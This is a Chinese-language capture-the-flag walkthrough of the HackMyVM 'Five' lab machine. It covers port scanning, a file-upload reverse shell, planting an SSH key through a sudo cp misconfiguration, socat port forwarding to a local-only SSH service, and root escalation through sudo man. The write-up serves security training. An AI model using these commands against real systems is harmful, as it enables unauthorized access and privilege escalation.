hack-my-vm-five

端口扫描

kali@kali [~] ➜  sudo nmap -sT --min-rate 1000 -p- 192.168.1.12                                                                                  [21:05:24]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 21:08 CST
Nmap scan report for 192.168.1.12
Host is up (0.0020s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:E0:FD:E7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds

只开放了一个80端口

80端口渗透

kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.12                                                                                           [20:08:03]
[sudo] kali 的密码：
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.12/_25-02-15_20-08-28.txt

Target: http://192.168.1.12/

[20:08:28] Starting: 
[20:08:36] 200 -    6B  - /3.php
[20:08:40] 301 -  185B  - /admin  ->  http://192.168.1.12/admin/
[20:08:41] 200 -    4KB - /admin/
[20:08:41] 200 -    4KB - /admin/index.html
[20:09:27] 200 -   17B  - /robots.txt
[20:09:37] 200 -  346B  - /upload.html
[20:09:37] 200 -   48B  - /upload.php
[20:09:37] 301 -  185B  - /uploads  ->  http://192.168.1.12/uploads/

这里收获不小，我当时先去看了admin，尝试了一下爆破和sql注入，没结果，感觉是文件上传，所以暂时放弃登录框

直接上传一张图片，发现是可以解析的

但是上传上去的php文件没办法解析，非常的离谱

发现报文是可以控制上传路径的，我们留空让其上传到网站的根目录下面

我们成功上传，随后我们访问该文件，监听端口等待shell回弹

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [21:19:27]
listening on [any] 8888 ...
connect to [192.168.1.4] from (UNKNOWN) [192.168.1.12] 46712
bash: cannot set terminal process group (334): Inappropriate ioctl for device
bash: no job control in this shell
www-data@five:~/html$ whoami
whoami
www-data
www-data@five:~/html$ 

提权

www-data@five:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on five:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp

发现了cp命令，我们可以直接将我们的公钥拷入melisa用户下，但是遗憾的是，这里并没有开放22端口

www-data@five:~/html$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      384/nginx: worker p 
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      384/nginx: worker p 
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -                   
www-data@five:~/html$ nc 127.0.0.1 4444
nc 127.0.0.1 4444
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

发现了一个4444端口，上面运行的是ssh服务，因为只能本机访问，所以这里直接端口转发，这里gpt给出了转发的方法

www-data@five:/tmp$ nohup socat TCP-LISTEN:3333,fork TCP:127.0.0.1:4444 &
nohup socat TCP-LISTEN:3333,fork TCP:127.0.0.1:4444 &
[1] 709
www-data@five:/tmp$ 

这样便成功转发了

www-data@five:/tmp$ cat x
cat x
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com
www-data@five:/tmp$ sudo -u melisa /bin/cp x /home/melisa/.ssh/authorized_keys
< melisa /bin/cp x /home/melisa/.ssh/authorized_keys

复制完成，我们直接登录即可

kali@kali [~/.ssh] ➜  ssh melisa@192.168.1.12 -p 3333                                                                                            [21:39:49]
The authenticity of host '[192.168.1.12]:3333 ([192.168.1.12]:3333)' can't be established.
ED25519 key fingerprint is SHA256:tzDbg+Bz/dhZxOEC2UQ0V1lBWPCIPWOJ3tbX0VtJ5Vg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.12]:3333' (ED25519) to the list of known hosts.
Linux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct  6 03:39:32 2020 from 192.168.1.58
melisa@five:~$ whoami
melisa
melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

成功登录，而且有很多sudo文件，我觉得可以用于提权的

这里是有SETENV的，理论是是支持LD_PRELOAD和LD_LIBRARY_PATH提权的，不过我也没尝试，毕竟gtfobins上有现成的man提权

但是我这里man没办法执行命令，问了别人，要用less分页，靶机的分页不是less，但是我尝试了LD_PRELOAD，是可以的，另一个没尝试，因为要找的ldd链接文件，劫持起来太麻烦了，可能会崩掉

melisa@five:/tmp$ sudo /bin/man -P /usr/bin/less man
root@five:/tmp# whoami
root
root@five:/tmp#